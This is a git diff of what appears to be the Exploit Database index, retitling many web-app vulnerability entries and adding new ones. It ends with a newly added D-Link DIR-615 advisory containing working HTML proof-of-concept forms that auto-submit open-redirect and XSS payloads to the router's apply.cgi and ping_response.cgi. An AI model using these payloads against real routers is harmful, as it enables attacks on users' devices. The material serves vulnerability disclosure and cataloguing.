 11349,platforms/php/webapps/11349.txt,"Exponent CMS 0.96.3 - (articlemodule) SQL Injection",2010-02-07,"T u R c O",php,webapps,0
 11350,platforms/php/webapps/11350.txt,"Belkatalog CMS - SQL Injection",2010-02-07,anonymous,php,webapps,0
 11352,platforms/php/webapps/11352.txt,"Joomla! Component com_productbook - SQL Injection",2010-02-07,snakespc,php,webapps,0
 11353,platforms/php/webapps/11353.txt,"Croogo 1.2.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-02-07,"Milos Zivanovic",php,webapps,0
-11354,platforms/php/webapps/11354.txt,"Killmonster 2.1 - (Authentication Bypass) SQL Injection",2010-02-07,cr4wl3r,php,webapps,0
+11354,platforms/php/webapps/11354.txt,"Killmonster 2.1 - Authentication Bypass",2010-02-07,cr4wl3r,php,webapps,0
 11355,platforms/php/webapps/11355.txt,"EncapsCMS 0.3.6 - (config[path]) Remote File Inclusion",2010-02-07,cr4wl3r,php,webapps,0
-11356,platforms/php/webapps/11356.txt,"Rostermain 1.1 - (Authentication Bypass) SQL Injection",2010-02-07,cr4wl3r,php,webapps,0
+11356,platforms/php/webapps/11356.txt,"Rostermain 1.1 - Authentication Bypass",2010-02-07,cr4wl3r,php,webapps,0
 11357,platforms/php/webapps/11357.txt,"Uiga Business Portal - SQL Injection / Cross-Site Scripting",2010-02-07,"Sioma Labs",php,webapps,0
 11358,platforms/php/webapps/11358.txt,"TinyMCE WYSIWYG Editor - Multiple Vulnerabilities",2010-02-07,mc2_s3lector,php,webapps,0
 11359,platforms/php/webapps/11359.txt,"JaxCMS 1.0 - Local File Inclusion",2010-02-08,"Hamza 'MizoZ' N.",php,webapps,0
@@ -22404,7 +22407,7 @@ id,file,description,date,author,platform,type,port
 11361,platforms/asp/webapps/11361.txt,"fipsForum 2.6 - Remote Database Disclosure",2010-02-09,ViRuSMaN,asp,webapps,0
 11365,platforms/php/webapps/11365.txt,"CPA Site Solutions - Arbitrary File Upload",2010-02-09,R3VAN_BASTARD,php,webapps,0
 11366,platforms/php/webapps/11366.txt,"NewsLetter Tailor - Database Backup Dump",2010-02-09,ViRuSMaN,php,webapps,0
-11367,platforms/php/webapps/11367.txt,"NewsLetter Tailor - (Authentication Bypass) SQL Injection",2010-02-09,ViRuSMaN,php,webapps,0
+11367,platforms/php/webapps/11367.txt,"NewsLetter Tailor - Authentication Bypass",2010-02-09,ViRuSMaN,php,webapps,0
 11368,platforms/php/webapps/11368.txt,"Yes Solutions - Webapp SQL Injection",2010-02-09,HackXBack,php,webapps,0
 11369,platforms/asp/webapps/11369.txt,"MOJO's IWms 7 - SQL Injection / Cross-Site Scripting",2010-02-09,cp77fk4r,asp,webapps,0
 11375,platforms/php/webapps/11375.txt,"Zomorrod CMS - SQL Injection",2010-02-09,"Pouya Daneshmand",php,webapps,0
@@ -22440,7 +22443,7 @@ id,file,description,date,author,platform,type,port
 11430,platforms/php/webapps/11430.txt,"southburn Web - 'products.php' SQL Injection",2010-02-13,AtT4CKxT3rR0r1ST,php,webapps,0
 11431,platforms/php/webapps/11431.txt,"MRW PHP Upload - Arbitrary File Upload",2010-02-13,Phenom,php,webapps,0
 11434,platforms/php/webapps/11434.txt,"statcountex 3.1 - Multiple Vulnerabilities",2010-02-13,Phenom,php,webapps,0
-11436,platforms/php/webapps/11436.txt,"WSN Guest 1.02 - (orderlinks) SQL Injection",2010-02-13,Gamoscu,php,webapps,0
+11436,platforms/php/webapps/11436.txt,"WSN Guest 1.02 - 'orderlinks' Parameter SQL Injection",2010-02-13,Gamoscu,php,webapps,0
 11437,platforms/php/webapps/11437.txt,"ZeusCMS 0.2 - Database Backup Dump / Local File Inclusion",2010-02-13,ViRuSMaN,php,webapps,0
 11440,platforms/php/webapps/11440.txt,"InterTech Co 1.0 - SQL Injection",2010-02-13,Red-D3v1L,php,webapps,0
 11441,platforms/php/webapps/11441.txt,"WordPress 2.9 - Failure to Restrict URL Access",2010-02-13,tmacuk,php,webapps,0
@@ -22532,23 +22535,23 @@ id,file,description,date,author,platform,type,port
 11580,platforms/aix/webapps/11580.txt,"FileExecutive 1 - Multiple Vulnerabilities",2010-02-26,ViRuSMaN,aix,webapps,0
 11582,platforms/php/webapps/11582.txt,"DZ Erotik Auktionshaus 4.rgo - news.php SQL Injection",2010-02-27,"Easy Laster",php,webapps,0
 11583,platforms/php/webapps/11583.pl,"Gravity Board X 2.0 Beta (Public Release 3) - SQL Injection",2010-02-27,Ctacok,php,webapps,0
-11584,platforms/php/webapps/11584.txt,"Project Man 1.0 - (Authentication Bypass) SQL Injection",2010-02-27,cr4wl3r,php,webapps,0
+11584,platforms/php/webapps/11584.txt,"Project Man 1.0 - Authentication Bypass",2010-02-27,cr4wl3r,php,webapps,0
 11585,platforms/php/webapps/11585.txt,"phpCDB 1.0 - Local File Inclusion",2010-02-27,cr4wl3r,php,webapps,0
 11586,platforms/php/webapps/11586.txt,"phpRAINCHECK 1.0.1 - SQL Injection",2010-02-27,cr4wl3r,php,webapps,0
 11587,platforms/php/webapps/11587.txt,"ProMan 0.1.1 - Multiple File Inclusion",2010-02-27,cr4wl3r,php,webapps,0
 11588,platforms/php/webapps/11588.txt,"phpMySite - Cross-Site Scripting / SQL Injection",2010-02-27,Crux,php,webapps,0
 11589,platforms/asp/webapps/11589.txt,"Pre Classified Listings - SQL Injection",2010-02-27,Crux,asp,webapps,0
 11592,platforms/php/webapps/11592.txt,"Scripts Feed Business Directory - SQL Injection",2010-02-27,Crux,php,webapps,0
-11593,platforms/php/webapps/11593.txt,"Uiga Fan Club 1.0 - (Authentication Bypass) SQL Injection",2010-02-27,cr4wl3r,php,webapps,0
+11593,platforms/php/webapps/11593.txt,"Uiga Fan Club 1.0 - Authentication Bypass",2010-02-27,cr4wl3r,php,webapps,0
 11595,platforms/php/webapps/11595.php,"Joomla! Component com_paxgallery - Blind Injection",2010-02-27,snakespc,php,webapps,0
 11596,platforms/php/webapps/11596.txt,"Slaed CMS 4.0 - Multiple Vulnerabilities",2010-02-27,indoushka,php,webapps,0
 11599,platforms/php/webapps/11599.txt,"Uiga Personal Portal - 'index.php' SQL Injection",2010-02-28,"Easy Laster",php,webapps,0
 11600,platforms/php/webapps/11600.txt,"Uiga Fan Club - 'index.php' SQL Injection",2010-02-28,"Easy Laster",php,webapps,0
-11602,platforms/php/webapps/11602.txt,"HazelPress Lite 0.0.4 - (Authentication Bypass) SQL Injection",2010-02-28,cr4wl3r,php,webapps,0
+11602,platforms/php/webapps/11602.txt,"HazelPress Lite 0.0.4 - Authentication Bypass",2010-02-28,cr4wl3r,php,webapps,0
 11603,platforms/php/webapps/11603.txt,"Joomla! Component com_yanc - SQL Injection",2010-02-28,snakespc,php,webapps,0
 11604,platforms/php/webapps/11604.php,"Joomla! Component com_liveticker - Blind SQL Injection",2010-02-28,snakespc,php,webapps,0
 11605,platforms/php/webapps/11605.txt,"Baykus Yemek Tarifleri 2.1 - SQL Injection",2010-02-28,cr4wl3r,php,webapps,0
-11606,platforms/asp/webapps/11606.txt,"Majoda CMS - (Authentication Bypass) SQL Injection",2010-02-28,Phenom,asp,webapps,0
+11606,platforms/asp/webapps/11606.txt,"Majoda CMS - Authentication Bypass",2010-02-28,Phenom,asp,webapps,0
 11609,platforms/php/webapps/11609.txt,"phptroubleticket 2.0 - 'id' SQL Injection",2010-03-01,kaMtiEz,php,webapps,0
 11610,platforms/php/webapps/11610.txt,"CMS by MyWorks - Multiple Vulnerabilities",2010-03-01,Palyo34,php,webapps,0
 11611,platforms/asp/webapps/11611.txt,"Al Sat Scripti - Database Download",2010-03-02,indoushka,asp,webapps,0
@@ -22688,7 +22691,7 @@ id,file,description,date,author,platform,type,port
 11830,platforms/php/webapps/11830.txt,"Fw-BofF (oolime-resurrection) 1.5.3beta - Multiple Remote File Inclusion",2010-03-21,cr4wl3r,php,webapps,0
 11831,platforms/php/webapps/11831.txt,"WebMaid CMS 0.2-6 Beta - Multiple Remote File Inclusion",2010-03-21,cr4wl3r,php,webapps,0
 11832,platforms/php/webapps/11832.txt,"NotSopureEdit 1.4.1 - Remote File Inclusion",2010-03-21,cr4wl3r,php,webapps,0
-11833,platforms/php/webapps/11833.txt,"4x CMS r26 - (Authentication Bypass) SQL Injection",2010-03-21,cr4wl3r,php,webapps,0
+11833,platforms/php/webapps/11833.txt,"4x CMS r26 - Authentication Bypass",2010-03-21,cr4wl3r,php,webapps,0
 11835,platforms/php/webapps/11835.txt,"Mini-CMS RibaFS 1.0 - Authentication Bypass",2010-03-22,cr4wl3r,php,webapps,0
 11836,platforms/php/webapps/11836.txt,"CMS Openpage - 'index.php' SQL Injection",2010-03-22,Phenom,php,webapps,0
 14128,platforms/php/webapps/14128.txt,"Joomla! Component com_wmtpic 1.0 - SQL Injection",2010-06-30,RoAd_KiLlEr,php,webapps,0
@@ -22768,8 +22771,8 @@ id,file,description,date,author,platform,type,port
 11951,platforms/php/webapps/11951.txt,"E-book Store - Multiple Vulnerabilities (1)",2010-03-30,indoushka,php,webapps,0
 11954,platforms/php/webapps/11954.txt,"Wazzum Dating Software - Multiple Vulnerabilities",2010-03-30,EL-KAHINA,php,webapps,0
 11960,platforms/php/webapps/11960.txt,"KimsQ 040109 - Multiple Remote File Inclusion",2010-03-30,mat,php,webapps,0
-11962,platforms/php/webapps/11962.txt,"Satellite-X 4.0 - (Authentication Bypass) SQL Injection",2010-03-30,indoushka,php,webapps,0
-11963,platforms/php/webapps/11963.txt,"Huron CMS 8 11 2007 - (Authentication Bypass) SQL Injection",2010-03-30,mat,php,webapps,0
+11962,platforms/php/webapps/11962.txt,"Satellite-X 4.0 - Authentication Bypass",2010-03-30,indoushka,php,webapps,0
+11963,platforms/php/webapps/11963.txt,"Huron CMS 8 11 2007 - Authentication Bypass",2010-03-30,mat,php,webapps,0
 11964,platforms/multiple/webapps/11964.pl,"Easy-Clanpage 2.1 - SQL Injection",2010-03-30,"Easy Laster",multiple,webapps,0
 11965,platforms/php/webapps/11965.txt,"kora - Reinstall Admin Information",2010-03-30,indoushka,php,webapps,0
 11967,platforms/php/webapps/11967.txt,"Snipe Photo Gallery - Bypass Arbitrary File Upload",2010-03-30,indoushka,php,webapps,0
@@ -22958,7 +22961,7 @@ id,file,description,date,author,platform,type,port
 12256,platforms/php/webapps/12256.txt,"ilchClan 1.0.5B - SQL Injection",2010-04-16,"Easy Laster",php,webapps,0
 12257,platforms/php/webapps/12257.txt,"Joomla! Component com_manager 1.5.3 - 'id' Parameter SQL Injection",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0
 12260,platforms/php/webapps/12260.txt,"SIESTTA 2.0 - Local File Inclusion / Cross-Site Scripting",2010-04-16,JosS,php,webapps,0
-12262,platforms/php/webapps/12262.php,"Zyke CMS 1.1 - (Authentication Bypass) SQL Injection",2010-04-16,"Giuseppe 'giudinvx' D'Inverno",php,webapps,0
+12262,platforms/php/webapps/12262.php,"Zyke CMS 1.1 - Authentication Bypass",2010-04-16,"Giuseppe 'giudinvx' D'Inverno",php,webapps,0
 12266,platforms/php/webapps/12266.txt,"60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change 'Username' and Password)",2010-04-16,EL-KAHINA,php,webapps,0
 12267,platforms/php/webapps/12267.txt,"WebAdmin - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0
 12268,platforms/php/webapps/12268.txt,"Uploader 0.7 - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0
@@ -23231,11 +23234,11 @@ id,file,description,date,author,platform,type,port
 12679,platforms/windows/webapps/12679.txt,"3Com* iMC (Intelligent Management Center) - Unauthenticated File Retrieval (Traversal)",2010-05-21,"Richard Brain",windows,webapps,0
 12680,platforms/windows/webapps/12680.txt,"3Com* iMC (Intelligent Management Center) - Cross-Site Scripting / Information Disclosure Flaws",2010-05-21,"Richard Brain",windows,webapps,0
 12684,platforms/php/webapps/12684.txt,"ConPresso 4.0.7 - SQL Injection",2010-05-21,Gamoscu,php,webapps,0
-12686,platforms/php/webapps/12686.txt,"Online University - (Authentication Bypass) SQL Injection",2010-05-21,cr4wl3r,php,webapps,0
+12686,platforms/php/webapps/12686.txt,"Online University - Authentication Bypass",2010-05-21,cr4wl3r,php,webapps,0
 12688,platforms/php/webapps/12688.txt,"JV2 Folder Gallery 3.1 - 'gallery.php' Remote File Inclusion",2010-05-21,"Sn!pEr.S!Te Hacker",php,webapps,0
 12689,platforms/multiple/webapps/12689.txt,"Apache Axis2 Administration Console - Authenticated Cross-Site Scripting",2010-05-21,"Richard Brain",multiple,webapps,0
 12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - 'FCKeditor' Arbitrary File Upload",2010-05-21,Ma3sTr0-Dz,php,webapps,0
-12691,platforms/php/webapps/12691.txt,"Online Job Board - (Authentication Bypass) SQL Injection",2010-05-21,cr4wl3r,php,webapps,0
+12691,platforms/php/webapps/12691.txt,"Online Job Board - Authentication Bypass",2010-05-21,cr4wl3r,php,webapps,0
 14322,platforms/php/webapps/14322.txt,"Edgephp ClickBank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0
 12692,platforms/php/webapps/12692.txt,"WordPress Plugin TinyBrowser - Arbitrary File Upload",2010-05-22,Ra3cH,php,webapps,0
 12693,platforms/asp/webapps/12693.txt,"Asset Manager - Arbitrary File Upload",2010-05-22,Ra3cH,asp,webapps,0
@@ -24007,7 +24010,7 @@ id,file,description,date,author,platform,type,port
 15135,platforms/php/webapps/15135.txt,"Car Portal 2.0 - Blind SQL Injection",2010-09-27,**RoAd_KiLlEr**,php,webapps,0
 15143,platforms/php/webapps/15143.txt,"e107 0.7.23 - SQL Injection",2010-09-28,"High-Tech Bridge SA",php,webapps,0
 15139,platforms/asp/webapps/15139.txt,"AtomatiCMS - Upload Arbitrary File",2010-09-28,Abysssec,asp,webapps,0
-15141,platforms/php/webapps/15141.txt,"JE CMS 1.0.0 - Authentication Bypass (via SQL Injection)",2010-09-28,Abysssec,php,webapps,0
+15141,platforms/php/webapps/15141.txt,"JE CMS 1.0.0 - Authentication Bypass",2010-09-28,Abysssec,php,webapps,0
 15144,platforms/windows/webapps/15144.txt,"Aleza Portal 1.6 - Insecure (SQL Injection) Cookie Handling",2010-09-28,KnocKout,windows,webapps,0
 15145,platforms/php/webapps/15145.txt,"Achievo 1.4.3 - Multiple Authorisation Flaws",2010-09-28,"Pablo Milano",php,webapps,0
 15146,platforms/php/webapps/15146.txt,"Achievo 1.4.3 - Cross-Site Request Forgery",2010-09-28,"Pablo Milano",php,webapps,0
@@ -24827,7 +24830,7 @@ id,file,description,date,author,platform,type,port
 17555,platforms/php/webapps/17555.txt,"vBulletin 4.0.x 4.1.3 - (messagegroupid) SQL Injection",2011-07-21,fb1h2s,php,webapps,0
 17556,platforms/php/webapps/17556.txt,"Joomla! Component JE Story Submit - Local File Inclusion",2011-07-21,v3n0m,php,webapps,0
 17560,platforms/php/webapps/17560.txt,"Joomla! Component 'mod_spo' - SQL Injection",2011-07-21,SeguridadBlanca,php,webapps,0
-17562,platforms/php/webapps/17562.php,"ExtCalendar2 - (Authentication Bypass/Cookie) SQL Injection",2011-07-23,Lagripe-Dz,php,webapps,0
+17562,platforms/php/webapps/17562.php,"ExtCalendar2 - (Authentication Bypass / Cookie) SQL Injection",2011-07-23,Lagripe-Dz,php,webapps,0
 17574,platforms/jsp/webapps/17574.php,"CA ARCserve D2D r15 GWT RPC - Multiple Vulnerabilities",2011-07-26,rgod,jsp,webapps,0
 17570,platforms/php/webapps/17570.txt,"MusicBox 3.7 - Multiple Vulnerabilities",2011-07-25,R@1D3N,php,webapps,0
 17571,platforms/php/webapps/17571.txt,"OpenX Ad Server 2.8.7 - Cross-Site Request Forgery",2011-07-26,"Narendra Shinde",php,webapps,0
@@ -25449,7 +25452,7 @@ id,file,description,date,author,platform,type,port
 18999,platforms/php/webapps/18999.php,"SN News 1.2 - (visualiza.php) SQL Injection",2012-06-06,WhiteCollarGroup,php,webapps,0
 19012,platforms/php/webapps/19012.txt,"WordPress Plugin Front File Manager 0.1 - Arbitrary File Upload",2012-06-08,"Adrien Thierry",php,webapps,0
 19013,platforms/php/webapps/19013.txt,"WordPress Plugin Easy Contact Forms Export 1.1.0 - Information Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0
-19005,platforms/php/webapps/19005.txt,"SN News 1.2 - '/admin/loger.php' Authentication Bypass (SQL Injection)",2012-06-07,"Yakir Wizman",php,webapps,0
+19005,platforms/php/webapps/19005.txt,"SN News 1.2 - '/admin/loger.php' Authentication Bypass",2012-06-07,"Yakir Wizman",php,webapps,0
 19003,platforms/php/webapps/19003.txt,"vanilla kpoll plugin 1.2 - Persistent Cross-Site Scripting",2012-06-06,"Henry Hoggard",php,webapps,0
 19007,platforms/php/webapps/19007.php,"PHPNet 1.8 - (ler.php) SQL Injection",2012-06-07,WhiteCollarGroup,php,webapps,0
 19008,platforms/php/webapps/19008.php,"WordPress Plugin Front End Upload 0.5.3 - Arbitrary File Upload",2012-06-07,"Adrien Thierry",php,webapps,0
@@ -27012,7 +27015,7 @@ id,file,description,date,author,platform,type,port
 24522,platforms/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,php,webapps,0
 24531,platforms/php/webapps/24531.txt,"Web Cookbook - Multiple Vulnerabilities",2013-02-21,cr4wl3r,php,webapps,0
 24530,platforms/php/webapps/24530.txt,"CKEditor 4.0.1 - Multiple Vulnerabilities",2013-02-20,AkaStep,php,webapps,0
-24533,platforms/php/webapps/24533.txt,"RTTucson Quotations Database Script - (Authentication Bypass) SQL Injection",2013-02-21,cr4wl3r,php,webapps,0
+24533,platforms/php/webapps/24533.txt,"RTTucson Quotations Database Script - Authentication Bypass",2013-02-21,cr4wl3r,php,webapps,0
 24534,platforms/windows/webapps/24534.txt,"Alt-N MDaemon 13.0.3 / 12.5.6 - Email Body HTML/JS Injection",2013-02-21,"QSecure and Demetris Papapetrou",windows,webapps,0
 24535,platforms/windows/webapps/24535.txt,"Alt-N MDaemon WorldClient 13.0.3 - Multiple Vulnerabilities",2013-02-21,"QSecure and Demetris Papapetrou",windows,webapps,0
 24536,platforms/php/webapps/24536.txt,"glFusion 1.2.2 - Multiple Cross-Site Scripting Vulnerabilities",2013-02-21,"High-Tech Bridge SA",php,webapps,0
@@ -28611,7 +28614,7 @@ id,file,description,date,author,platform,type,port
 26867,platforms/php/webapps/26867.txt,"PHP Fusebox 3.0 - 'index.php' Cross-Site Scripting",2005-12-19,"bogel and lukman",php,webapps,0
 26868,platforms/php/webapps/26868.txt,"jPORTAL 2.2.1/2.3 Forum - 'forum.php' SQL Injection",2005-12-19,Zbigniew,php,webapps,0
 26870,platforms/php/webapps/26870.txt,"Advanced Guestbook 2.x - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,Handrix,php,webapps,0
-26871,platforms/php/webapps/26871.txt,"PlaySms - 'index.php' Cross-Site Scripting",2005-12-19,mohajali2k4,php,webapps,0
+26871,platforms/php/webapps/26871.txt,"PlaySms 0.8 - 'index.php' Cross-Site Scripting",2005-12-19,mohajali2k4,php,webapps,0
 26872,platforms/php/webapps/26872.txt,"PHP-Fusion 6.0 - 'members.php' Cross-Site Scripting",2005-12-19,krasza,php,webapps,0
 26873,platforms/asp/webapps/26873.txt,"Acidcat CMS 2.1.13 - 'ID' Parameter SQL Injection",2005-12-19,admin@hamid.ir,asp,webapps,0
 26874,platforms/asp/webapps/26874.txt,"Acidcat CMS 2.1.13 - 'acidcat.mdb' Remote Information Disclosure",2005-12-19,admin@hamid.ir,asp,webapps,0
@@ -29544,7 +29547,7 @@ id,file,description,date,author,platform,type,port
 28124,platforms/php/webapps/28124.pl,"MKPortal 1.0.1 - 'index.php' Directory Traversal",2006-06-28,rUnViRuS,php,webapps,0
 28125,platforms/php/webapps/28125.txt,"PHPClassifieds.Info - Multiple Input Validation Vulnerabilities",2006-06-28,Luny,php,webapps,0
 28126,platforms/php/webapps/28126.rb,"Woltlab Burning Board FLVideo Addon - 'video.php value Parameter' SQL Injection",2013-09-06,"Easy Laster",php,webapps,0
-28129,platforms/php/webapps/28129.txt,"Practico CMS 13.7 - Authentication Bypass (SQL Injection)",2013-09-06,shiZheni,php,webapps,0
+28129,platforms/php/webapps/28129.txt,"Practico CMS 13.7 - Authentication Bypass",2013-09-06,shiZheni,php,webapps,0
 28131,platforms/php/webapps/28131.txt,"PHP ICalender 2.22 - 'index.php' Cross-Site Scripting",2006-06-29,"Kurdish Security",php,webapps,0
 28132,platforms/php/webapps/28132.txt,"newsPHP 2006 PRO - 'index.php' Multiple Parameter Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0
 28133,platforms/php/webapps/28133.txt,"newsPHP 2006 PRO - 'index.php' Multiple Parameter SQL Injection",2006-06-29,securityconnection,php,webapps,0
@@ -30217,6 +30220,7 @@ id,file,description,date,author,platform,type,port
 29049,platforms/php/webapps/29049.txt,"BlogTorrent Preview 0.92 - Announce.php Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0
 29050,platforms/php/webapps/29050.txt,"Odysseus Blog 1.0 - blog.php Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0
 29051,platforms/php/webapps/29051.txt,"Sphpblog 0.8 - Multiple Cross-Site Scripting Vulnerabilities",2006-11-16,the_Edit0r,php,webapps,0
+41035,platforms/php/webapps/41035.txt,"Airbnb Clone Script - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0
 29053,platforms/asp/webapps/29053.txt,"Image Gallery with Access Database - dispimage.asp id Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0
 29054,platforms/asp/webapps/29054.txt,"Image Gallery with Access Database - default.asp Multiple Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0
 29058,platforms/php/webapps/29058.txt,"phpMyAdmin 2.x - db_create.php db Parameter Cross-Site Scripting",2006-09-15,"laurent gaffie",php,webapps,0
@@ -35326,7 +35330,7 @@ id,file,description,date,author,platform,type,port
 37283,platforms/php/webapps/37283.txt,"AZ Photo Album - Cross-Site Scripting / Arbitrary File Upload",2012-05-20,"Eyup CELIK",php,webapps,0
 37316,platforms/php/webapps/37316.txt,"phpCollab 2.5 - Unauthenticated Direct Request Multiple Protected Page Access",2012-05-24,"team ' and 1=1--",php,webapps,0
 37354,platforms/php/webapps/37354.py,"Bigware Shop 2.1x - 'main_bigware_54.php' SQL Injection",2012-06-05,rwenzel,php,webapps,0
-37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - (Authentication Bypass) SQL Injection",2015-06-15,"walid naceri",php,webapps,0
+37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - Authentication Bypass",2015-06-15,"walid naceri",php,webapps,0
 37329,platforms/php/webapps/37329.txt,"Nilehoster Topics Viewer 2.3 - Multiple SQL Injections / Local File Inclusion",2012-05-27,n4ss1m,php,webapps,0
 37330,platforms/php/webapps/37330.txt,"Yamamah Photo Gallery 1.1 - Database Information Disclosure",2012-05-28,L3b-r1'z,php,webapps,0
 37331,platforms/php/webapps/37331.py,"WHMCS - 'boleto_bb.php' SQL Injection",2012-05-29,dex,php,webapps,0
@@ -36743,7 +36747,7 @@ id,file,description,date,author,platform,type,port
 40214,platforms/php/webapps/40214.txt,"NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion",2016-08-06,LiquidWorm,php,webapps,80
 40215,platforms/php/webapps/40215.txt,"NUUO NVRmini 2 3.0.8 - 'strong_user.php' Backdoor Remote Shell Access",2016-08-06,LiquidWorm,php,webapps,80
 40216,platforms/jsp/webapps/40216.txt,"Navis Webaccess - SQL Injection",2016-08-08,bRpsd,jsp,webapps,9000
-40218,platforms/php/webapps/40218.txt,"PHPCollab CMS 2.5 - (emailusers.php) SQL Injection",2016-08-08,Vulnerability-Lab,php,webapps,80
+40218,platforms/php/webapps/40218.txt,"PHPCollab CMS 2.5 - 'emailusers.php' SQL Injection",2016-08-08,Vulnerability-Lab,php,webapps,80
 40220,platforms/php/webapps/40220.txt,"WordPress Plugin Add From Server < 3.3.2 - Cross-Site Request Forgery (Arbitrary File Upload)",2016-08-08,"Edwin Molenaar",php,webapps,80
 40221,platforms/php/webapps/40221.txt,"Nagios Network Analyzer 2.2.1 - Multiple Cross-Site Request Forgery",2016-08-10,hyp3rlinx,php,webapps,80
 40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Unauthenticated Server-Side Request Forgery",2016-08-10,"Dawid Golunski",php,webapps,80
@@ -36960,8 +36964,17 @@ id,file,description,date,author,platform,type,port
 41006,platforms/php/webapps/41006.txt,"WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation",2017-01-10,"Kacper Szurek",php,webapps,0
 41007,platforms/php/webapps/41007.html,"FMyLife Clone Script (Pro Edition) 1.1 - Cross-Site Request Forgery (Add Admin)",2017-01-10,"Ihsan Sencan",php,webapps,0
 41009,platforms/php/webapps/41009.txt,"Starting Page 1.3 - 'category' Parameter SQL Injection",2017-01-11,"Ben Lee",php,webapps,0
-41010,platforms/php/webapps/41010.txt,"My link trader 1.1 - 'id' Parameter SQL Injection",2017-01-11,"Dawid Morawski",php,webapps,0
+41010,platforms/php/webapps/41010.txt,"My Link Trader 1.1 - 'id' Parameter SQL Injection",2017-01-11,"Dawid Morawski",php,webapps,0
+41011,platforms/php/webapps/41011.txt,"b2evolution 6.8.2 - Arbitrary File Upload",2016-12-29,"Li Fei",php,webapps,0
 41014,platforms/java/webapps/41014.txt,"Blackboard LMS 9.1 SP14 - Cross-Site Scripting",2017-01-09,Vulnerability-Lab,java,webapps,0
 41017,platforms/hardware/webapps/41017.txt,"Huawei Flybox B660 - Cross-Site Request Forgery",2017-01-10,Vulnerability-Lab,hardware,webapps,0
 41023,platforms/php/webapps/41023.txt,"Travel Portal Script 9.33 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps,0
 41024,platforms/php/webapps/41024.txt,"Movie Portal Script 7.35 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps,0
+41028,platforms/php/webapps/41028.txt,"Job Portal Script 9.11 - Authentication Bypass",2017-01-12,"Dawid Morawski",php,webapps,0
+41029,platforms/php/webapps/41029.txt,"Online Food Delivery 2.04 - Authentication Bypass",2017-01-12,"Dawid Morawski",php,webapps,0
+41032,platforms/php/webapps/41032.pl,"iTechscripts Freelancer Script 5.11 - 'sk' Parameter SQL Injection",2017-01-11,v3n0m,php,webapps,0
+41033,platforms/hardware/webapps/41033.txt,"D-Link DIR-615 - Multiple Vulnerabilities",2017-01-10,"Osanda Malith",hardware,webapps,0
+41034,platforms/php/webapps/41034.txt,"School Management Software 2.75 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps,0
+41036,platforms/php/webapps/41036.txt,"Penny Auction Script - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0
+41037,platforms/php/webapps/41037.txt,"ECommerce-TIBSECART - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0
+41038,platforms/php/webapps/41038.txt,"ECommerce-Multi-Vendor Software - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/hardware/webapps/41033.txt b/platforms/hardware/webapps/41033.txt
new file mode 100755
index 000000000..795733402
--- /dev/null
+++ b/platforms/hardware/webapps/41033.txt
@@ -0,0 +1,83 @@
+# Title:            D-Link DIR-615 Multiple Vulnerabilities
+# Date:             10-01-2017
+# Hardware Version: E3
+# Firmware Version: 5.10
+# Tested on:        Windows 8 64-bit
+# Exploit Author:   Osanda Malith Jayathissa (@OsandaMalith)
+# Original write-up:https://osandamalith.com/2017/01/04/d-link-dir-615-open-redirection-and-xss/
+
+Overview
+--------
+
+The 'apply.cgi' file was vulnerable to Open Redirection and XSS. Inside the router many other cgi files too use this functionality in 'apply.cgi'. For example the 'ping_response.cgi' file.
+
+Open Redirection
+-----------------
+# apply.cgi
+
+<html>
+<!-- @OsandaMalith -->
+  <body>
+    <form action="http://192.168.0.1/apply.cgi" method="POST" id="exploit">
+      <input type="hidden" name="html&#95;response&#95;page" value="https&#58;&#47;&#47;google&#46;lk" />
+      <input type="hidden" name="html&#95;response&#95;return&#95;page" value="tools&#95;vct&#46;asp" />
+	<img src=x onerror="exploit.submit()"/>
+    </form>
+  </body>
+</html>
+
+# ping_response.cgi
+
+<html>
+<!-- @OsandaMalith -->
+  <body>
+    <form action="http://192.168.0.1/ping_response.cgi" method="POST" id="exploit">
+      <input type="hidden" name="html&#95;response&#95;page" value="https&#58;&#47;&#47;google&#46;lk" />
+      <input type="hidden" name="html&#95;response&#95;return&#95;page" value="tools&#95;vct&#46;asp" />
+      <input type="hidden" name="ping&#95;ipaddr" value="192&#46;168&#46;0&#46;101" />
+      <input type="hidden" name="ping" value="Ping" />
+	<img src=x onerror="exploit.submit()"/>
+    </form>
+  </body>
+</html>
+
+
+POST XSS
+---------
+
+# apply.cgi
+
+<html>
+<!-- @OsandaMalith -->
+  <body>
+    <form action="http://192.168.0.1/apply.cgi" method="POST" id="exploit">
+      <input type="hidden" name="html&#95;response&#95;page" value="javascript&#58;confirm&#40;&#47;&#64;OsandaMalith&#47;&#41;" />
+      <input type="hidden" name="html&#95;response&#95;return&#95;page" value="tools&#95;vct&#46;asp" />
+	<img src=x onerror="exploit.submit()"/>
+    </form>
+  </body>
+</html>
+
+
+# ping_response.cgi
+
+<html>
+  <!-- @OsandaMalith -->
+  <body>
+    <form action="http://192.168.0.1/ping_response.cgi" method="POST" id="exploit">
+      <input type="hidden" name="html&#95;response&#95;page" value="javascript&#58;confirm&#40;&#47;&#64;OsandaMalith&#47;&#41;" />
